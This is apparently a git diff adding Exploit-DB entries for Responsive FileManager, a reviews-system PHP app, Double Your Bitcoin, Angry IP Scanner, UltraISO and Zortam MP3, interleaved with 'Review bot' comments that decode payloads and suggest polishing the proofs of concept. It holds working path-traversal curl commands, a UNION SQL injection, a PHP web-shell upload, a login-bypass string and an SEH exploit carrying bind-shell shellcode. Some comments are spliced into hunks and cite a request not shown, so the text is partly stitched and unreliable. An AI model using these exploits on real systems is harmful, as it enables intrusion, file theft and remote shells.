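Review bot: The trailing `\x0d\x0a` inside the double-quoted `--data-binary` argument is sent literally as the eight characters `\x0d\x0a` by bash — no escape processing happens inside double quotes — not as CRLF, so the bytes on the wire differ from the raw request above; the JSON is complete without it, so drop it from the curl command. Step 5 uses `projectVersions/0/authEntities` while the captured request and Step 6 use `projectVersions/3`; pick one so the expected `200` matches the request shown. The root cause matches CVE-2018-7690 in the sibling advisory: the `/api/v1/bulk` wrapper forwards the sub-request to `/projectVersions/{id}/authEntities` without an ownership check on `id`, so the server-side fix is the per-project authorization check, not a filter on the bulk endpoint alone.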
@@ -0,0 +1,99 @@
+Responsive FileManager 9.13.4 - Multiple Vulnerabilities
+
+Date:
+ December 12, 2018
+
+Author:
+ farisv
+
+Vendor Homepage:
+ https://www.responsivefilemanager.com/
+
+Vulnerable Package Link:
+ https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.4/responsive_filemanager.zip
+
+
+Responsive FileManager is a free open-source file manager and image manager made with the jQuery library, CSS3, PHP and HTML5 that offers a nice and elegant way to upload and insert files, images and videos.
+You can use it as external plugin for TinyMCE version 4.x (and older), CKEditor CLEditor, or you can also use it as a stand-alone file manager to manage and select files.
+
+The following are the vulnerabilities found before v 9.14.0.
+
+1. Arbitrary file read via path traversal with `path` parameter through `get_file` action in ajax_calls.php.
+
+$ curl -X POST -d "path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=get_file&sub_action=edit&preview_mode=text"
+%
+
+2. Arbitrary file read via path traversal with `path` parameter through `copy_cut` action in ajax_calls.php and `paste_clipboard` action in execute.php.
+
+# Copy/cut the file with directory traversal so the desired file path will be saved to the session.
+$ curl -X POST -d "sub_action=copy&path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=copy_cut"
+
+# Paste the clipboard
+$ curl -X POST -d "path=" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=paste_clipboard"
+
+# File is in the `upload_dir` folder or in the dialog page.
+$ curl http://localhost:1111/source/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+
+3. Arbitrary file write via path traversal mitigation bypass through `create_file` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../../../../../../../../tmp/&names[0]=hacked.txt&new_content=Hacked" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=create_file"
+$ ls /tmp
+hacked.txt
+
+4. Arbitrary file deletion via path traversal mitigation bypass through `delete_file` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../../../../../../../../tmp/hacked.txt" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_file"
+
+5. Arbitrary directory deletion via path traversal mitigation bypass through `delete_folder` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../filemanager" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_folder"
+
+6. Arbitrary file write (only with jpg/jpeg/png extension) with `path` parameter through `save_img` action in ajax_calls.php.
+
+$ curl -X POST -d "path=../../../../../../../tmp/&name=hacked.jpg&url=http://s3.amazonaws.com/feather-files-aviary-prod-us-east-1/2444282ef4344e3dacdedc7a78f8877d/2018-10-23/44f0f34961464feb92b53d953b02d4bb.jpg" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=save_img"
+$ ls /tmp
+hacked.jpg
+
+7. Persistent XSS in `media_preview` action.
+
+Upload a file with valid media extension (e.g. mp3) with XSS payload in the name. For example, "a\"%2balert(document.cookie)%2b\"".mp3 will trigger `alert(document.cookie)` when previewed.
\ No newline at end of file
diff --git a/exploits/php/webapps/45992.html b/exploits/php/webapps/45992.html
new file mode 100644
index 000000000..7cbefe60d
--- /dev/null
+++ b/exploits/php/webapps/45992.html
@@ -0,0 +1,20 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery
+# Date: 2018-12-13
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
+# Version: v1 (REQUIRED)
+# Tested on: Linux
+
+# 1 Poof Of Concept (Change password):
+
+
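Review bot: Item 6 (`save_img`) is more than an arbitrary write: the server fetches the attacker-supplied `url=` itself and stores the body at `path` + `name`, which also makes it a server-side request primitive against internal hosts — whether the fetched content is validated as an image is not shown here, so confirm before relying on that. For items 3–5 the "array bypass" indicates the traversal filter is applied to the raw `paths`/`names` string but not to each element when they arrive as arrays; the fix on the application side is to `realpath()` every element and reject any that does not start with the configured upload base directory, rather than pattern-matching `../`. Item 2 chains `copy_cut` into `paste_clipboard` so that `/etc/passwd` is copied into the web root and served at `/source/passwd` — that leaves the loot world-readable, so a tester should delete it afterwards (item 4 shows how).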
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45994.txt b/exploits/php/webapps/45994.txt
new file mode 100644
index 000000000..d8d310847
--- /dev/null
+++ b/exploits/php/webapps/45994.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - SQL Injection
+# Dork: N/A
+# Date: 2018-12-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
+#
+
+GET /[PATH]/reviews/campaign_add.php?id=%2d%31%27%20%20%55%4e%49%4f%4e+%53%45%4c%45%43%54+1,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29,3,4,5,%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33,24,25,%32%36%2c%32%37%2c%32%38%2c%32%39,30--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Fri, 14 Dec 2018 18:09:22 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45995.txt b/exploits/php/webapps/45995.txt
new file mode 100644
index 000000000..705f14ef2
--- /dev/null
+++ b/exploits/php/webapps/45995.txt
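Review bot: The PoC ends at a `200 OK` with no response body, so nothing in the hunk shows that the injection actually executed; include the page fragment containing the `CONCAT_WS(...)` output (USER(), DATABASE(), VERSION()) or a boolean/time-based variant with a measurable difference. The URL-encoded payload is hard to read as shipped — add the decoded form once as a comment: `-1' UNION SELECT 1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,...,30-- -` (30 columns). The request carries a `PHPSESSID` cookie, so `campaign_add.php` may only be reachable with an authenticated session — state whether it is pre-auth, since that changes the severity. The application-side fix is a prepared statement for `id`, ideally after an integer cast since it is a record identifier.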
@@ -0,0 +1,84 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
+# Dork: N/A
+# Date: 2018-12-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
+#
+
+POST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/octet-stream
+Content-Length: 922
+Referer: http://localhost/[PATH]/reviews/custom_reviews_add.php
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------4704926813981: undefined
+Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
+
+-----------------------------4704926813981
+Content-Disposition: form-data; name="hidden_photo"
+-----------------------------4704926813981
+Content-Disposition: form-data; name="name"
+Efe
+-----------------------------4704926813981
+Content-Disposition: form-data; name="rating"
+4.5
+-----------------------------4704926813981
+Content-Disposition: form-data; name="review"
+Efe
+-----------------------------4704926813981
+Content-Disposition: form-data; name="date"
+12/14/2018
+-----------------------------4704926813981
+Content-Disposition: form-data; name="id"
+-----------------------------4704926813981
+Content-Disposition: form-data; name="submit"
+submit
+-----------------------------4704926813981--
+HTTP/1.1 302 Found
+Date: Fri, 14 Dec 2018 18:17:48 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: custom_reviews.php
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/reviews/custom_reviews.php
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 14 Dec 2018 18:17:49 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45997.txt b/exploits/php/webapps/45997.txt
new file mode 100644
index 000000000..2823943c2
--- /dev/null
+++ b/exploits/php/webapps/45997.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass
+# Date: 2018-12-08
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018
+# Version: v1 (REQUIRED)
+# Tested on: Linux
+http://traget/admin/index.php
+
+username: '=''or'
+
+Password: '=''or'
\ No newline at end of file
diff --git a/exploits/windows/dos/45993.py b/exploits/windows/dos/45993.py
new file mode 100755
index 000000000..ef7ea778f
--- /dev/null
+++ b/exploits/windows/dos/45993.py
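Review bot: The `# POC:` block at the top of 45995.txt still reads `# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]`, which is the SQL-injection line copied from 45994.txt and does not describe the request that follows (a multipart POST to `action.php?action=custom_reviews` whose `photo` part carries a `.php` filename, then a GET of the stored file under `reviews/uploads/`). The header should name the actual entry point, e.g. `# http://localhost/[PATH]/reviews/action.php?action=custom_reviews  (unvalidated upload via the "photo" field)`. The hunk also has a line-count mismatch worth checking before indexing: the `@@ -0,0 +1,84 @@` header announces 84 lines but only 82 are reproduced here, so the empty-value lines of the `hidden_photo` and `id` parts appear to have been lost. A closing remediation line (validate the upload's extension and type server-side and store uploads outside the web root) would make the entry useful to the people who have to fix it.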
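Review bot: The target URL in 45997.txt is misspelled, `http://traget/admin/index.php`, and the version line still carries the submission-template placeholder, `# Version: v1 (REQUIRED)`; both should be corrected before the entry is indexed, e.g. `http://TARGET/admin/index.php` and `# Version: v1`. The header also lacks the `# Category:` and `# CVE:` lines the other advisories in this batch carry, and the CSV row dates the entry 2018-12-14 while the file says `# Date: 2018-12-08`, so the metadata is inconsistent with the index.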
@@ -0,0 +1,21 @@
+#!/usr/bin/python
+# -*- coding: cp1252 -*-
+# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC)
+# Author: Fernando Cruz
+# Date: 13/12/2018
+# Vendor Homepage: https://angryip.org
+# Tested Version: 3.11
+# Tested on Windows 10 Pro, 64-bit
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python angryip.py
+# 2.- Open angryip.txt and copy content to clipboard
+# 3.- Open Angry IP Scanner
+# 4.- Go to "Herramientas" in toolbar, click on "Preferencias", then in the tap "Mostrar",
+# 5.- Paste ClipBoard on "El valor no está disponible (sin resultados):", and click on "OK",
+# 6.- Crashed
+
+buffer = "\x41" * 44455293
+f = open("angryip.txt" , 'w')
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/45996.py b/exploits/windows/dos/45996.py
new file mode 100755
index 000000000..b230798ea
--- /dev/null
+++ b/exploits/windows/dos/45996.py
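Review bot: The header of 45993.py contradicts itself: the title (and the CSV row) say `Angry IP Scanner 3.5.3`, while `# Tested Version: 3.11` names a different version, so the affected version is ambiguous; one of the two lines should be corrected. The file write at the bottom leaks the handle if `f.write` raises and should be the context-manager form, `with open("angryip.txt", "w") as f:` followed by `    f.write(buffer)`. A one-line comment on `44455293` stating that it is simply the input length observed to trigger the crash would stop it reading as an unexplained magic number.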
@@ -0,0 +1,27 @@
+# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite
+# Discovery by: Francisco Ramirez
+# Discovery Date: 2018-12-14
+# Vendor Homepage: https://www.ultraiso.com/
+# Software Link : https://www.ultraiso.com/download.html
+# Tested Version: 9.7.1.3519
+# Tested on: Windows 10 Pro - 64 bit
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python UltraISO_9.7.1.3519.py
+# 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard
+# 3.- Open UltraISO_9.7.1.3519
+# 4.- In the Window select 'Tools' > 'Make CD/DVD Image'
+# 5.- In the field 'Output FileName' remove the default path.
+# 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName'
+# 7.- Click 'Make' and you will see a crash.
+
+#!/usr/bin/env python
+
+a_letters = "\x41" * 304
+seRecord = "\x42" * 4
+sehRecord = "\x43" * 4
+buffer = a_letters + seRecord + sehRecord
+f = open ("UltraISO_9.7.1.3519.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/45988.py b/exploits/windows/local/45988.py
new file mode 100755
index 000000000..12fc88a39
--- /dev/null
+++ b/exploits/windows/local/45988.py
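Review bot: The `#!/usr/bin/env python` line in 45996.py sits on line 19, after the comment header, where it is an ordinary comment with no effect; move it to line 1 or drop it. The title claims both a denial of service and an SEH-record overwrite, but the script only writes 312 bytes of constant filler (`a_letters + seRecord + sehRecord`) and the file's own `# Vulnerability Type:` line says DoS, so the title should be trimmed to what the PoC demonstrates, or the header should say which observation backs the overwrite claim. As in 45993.py, the write should use `with open("UltraISO_9.7.1.3519.txt", "w") as f:` rather than the open/write/close triple.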
@@ -0,0 +1,89 @@
+#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
+#Version: 24.15
+#Exploit Author: Manpreet Singh Kheberi
+#Date: December 13 2018
+#Download Link: https://www.zortam.com/download.html
+#Vendor Homepage: https://www.zortam.com
+#Tested on: Windows Xp Sp3 x64
+#Type: Bind shell
+print "-----------------------------------------------------------------------------------------------------------------------"
+print " Zortam MP3 media studio Exploit (SEH) "
+print " by Manpreet Singh Kheberi "
+print "Generated File zortam-exploit.txt "
+print "INSTRUCTIONS:"
+print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 "
+print "-----------------------------------------------------------------------------------------------------------------------"
+
+
+filename = "zortam-exploit.txt"
+junk = "\x41"*268
+nseh="\x90\x90\xeb\x12"
+
+seh ="\x8e\x32\xb5\x02"
+
+nop="\x90"*19
+brk="\x90\x90\x90\x90"
+
+# bind shell generated using metasploit
+#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python
+# This will open a bind shell on port 4444
+# use ncat Target-IP 4444
+
+buf = ""
+buf += "\xda\xdf\xbd\xb7\x95\xd2\xc2\xd9\x74\x24\xf4\x5b\x33"
+buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x6b\x13\x03\xdc\x86\x30"
+buf += "\x37\xde\x41\x36\xb8\x1e\x92\x57\x30\xfb\xa3\x57\x26"
+buf += "\x88\x94\x67\x2c\xdc\x18\x03\x60\xf4\xab\x61\xad\xfb"
+buf += "\x1c\xcf\x8b\x32\x9c\x7c\xef\x55\x1e\x7f\x3c\xb5\x1f"
+buf += "\xb0\x31\xb4\x58\xad\xb8\xe4\x31\xb9\x6f\x18\x35\xf7"
+buf += "\xb3\x93\x05\x19\xb4\x40\xdd\x18\x95\xd7\x55\x43\x35"
+buf += "\xd6\xba\xff\x7c\xc0\xdf\x3a\x36\x7b\x2b\xb0\xc9\xad"
+buf += "\x65\x39\x65\x90\x49\xc8\x77\xd5\x6e\x33\x02\x2f\x8d"
+buf += "\xce\x15\xf4\xef\x14\x93\xee\x48\xde\x03\xca\x69\x33"
+buf += "\xd5\x99\x66\xf8\x91\xc5\x6a\xff\x76\x7e\x96\x74\x79"
+buf += "\x50\x1e\xce\x5e\x74\x7a\x94\xff\x2d\x26\x7b\xff\x2d"
+buf += "\x89\x24\xa5\x26\x24\x30\xd4\x65\x21\xf5\xd5\x95\xb1"
+buf += "\x91\x6e\xe6\x83\x3e\xc5\x60\xa8\xb7\xc3\x77\xcf\xed"
+buf += "\xb4\xe7\x2e\x0e\xc5\x2e\xf5\x5a\x95\x58\xdc\xe2\x7e"
+buf += "\x98\xe1\x36\xea\x90\x44\xe9\x09\x5d\x36\x59\x8e\xcd"
+buf += "\xdf\xb3\x01\x32\xff\xbb\xcb\x5b\x68\x46\xf4\x72\x35"
+buf += "\xcf\x12\x1e\xd5\x99\x8d\xb6\x17\xfe\x05\x21\x67\xd4"
+buf += "\x3d\xc5\x20\x3e\xf9\xea\xb0\x14\xad\x7c\x3b\x7b\x69"
+buf += "\x9d\x3c\x56\xd9\xca\xab\x2c\x88\xb9\x4a\x30\x81\x29"
+buf += "\xee\xa3\x4e\xa9\x79\xd8\xd8\xfe\x2e\x2e\x11\x6a\xc3"
+buf += "\x09\x8b\x88\x1e\xcf\xf4\x08\xc5\x2c\xfa\x91\x88\x09"
+buf += "\xd8\x81\x54\x91\x64\xf5\x08\xc4\x32\xa3\xee\xbe\xf4"
+buf += "\x1d\xb9\x6d\x5f\xc9\x3c\x5e\x60\x8f\x40\x8b\x16\x6f"
+buf += "\xf0\x62\x6f\x90\x3d\xe3\x67\xe9\x23\x93\x88\x20\xe0"
+buf += "\xa3\xc2\x68\x41\x2c\x8b\xf9\xd3\x31\x2c\xd4\x10\x4c"
+buf += "\xaf\xdc\xe8\xab\xaf\x95\xed\xf0\x77\x46\x9c\x69\x12"
+buf += "\x68\x33\x89\x37"
+
+#boom+= "\xCC\xCC\xCC\xCC"
+#calc.exe
+
+
+# Used for initial exploit development phase
+bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
+bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
+bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
+bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
+bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
+bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
+bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
+bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
+bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
+bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
+bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
+bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
+bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
+bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
+bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
+bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
+
+
+
+exploit = junk+nseh+seh+nop+brk+buf
+textfile = open(filename,"w")
+textfile.write(exploit)
+textfile.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index fa00ac936..8bc6ca9b2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6212,6 +6212,8 @@ id,file,description,date,author,type,platform,port
 45968,exploits/windows/dos/45968.py,"LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)",2018-12-11,"Gionathan Reale",dos,windows,
 45983,exploits/linux/dos/45983.txt,"Linux - 'userfaultfd' Bypasses tmpfs File Permissions",2018-12-13,"Google Security Research",dos,linux,
 45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple,
+45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,
+45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
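Review bot: The `bchar` block in 45988.py is dead code: it is assigned across 16 lines but never referenced, and its escapes lack the backslash (`"x01x02..."` is a plain ASCII string, not the 0x01-0xff byte sequence the comment `# Used for initial exploit development phase` implies), so it documents nothing and should be removed along with the commented-out `#boom+=` / `#calc.exe` remnants. The script is Python 2 only (`print "..."` statements) yet carries no shebang or interpreter note, so a reader on Python 3 gets a SyntaxError before the header is even read; a first line `#!/usr/bin/python2` or a `# Requires Python 2` comment would fix that. The hard-coded `seh` value `"\x8e\x32\xb5\x02"` has no comment saying which module and build it was taken from, which is the one fact a defender needs to judge whether the PoC applies to their installed version. The trailing write should be `with open(filename, "w") as textfile:` / `    textfile.write(exploit)` rather than the open/write/close triple.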
@@ -10145,6 +10147,7 @@ id,file,description,date,author,type,platform,port
 45960,exploits/multiple/local/45960.txt,"XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection",2018-12-11,"Google Security Research",local,multiple,
 45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows,
 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
+45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17002,6 +17005,8 @@ id,file,description,date,author,type,platform,port
 45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
 45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22
 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
+45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
+45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38035,7 +38040,7 @@ id,file,description,date,author,type,platform,port
 43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,
 43591,exploits/php/webapps/43591.txt,"RISE 1.9 - 'search' SQL Injection",2018-01-15,"Ahmad Mahfouz",webapps,php,
 43592,exploits/jsp/webapps/43592.txt,"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect",2018-01-15,"Andrew Gill",webapps,jsp,
-43593,exploits/php/webapps/43593.py,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
+43593,exploits/php/webapps/43593.txt,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
 43594,exploits/java/webapps/43594.txt,"Oracle PeopleSoft 8.5x - Remote Code Execution",2018-01-15,"Vahagn Vardanyan",webapps,java,
 43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
 43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
@@ -40480,3 +40485,11 @@ id,file,description,date,author,type,platform,port
 45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80
 45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,80
 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,
+45987,exploits/php/webapps/45987.txt,"Responsive FileManager 9.13.4 - Multiple Vulnerabilities",2018-12-14,"Fariskhi Vidyan",webapps,php,
+45989,exploits/multiple/webapps/45989.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure",2018-12-14,alt3kx,webapps,multiple,
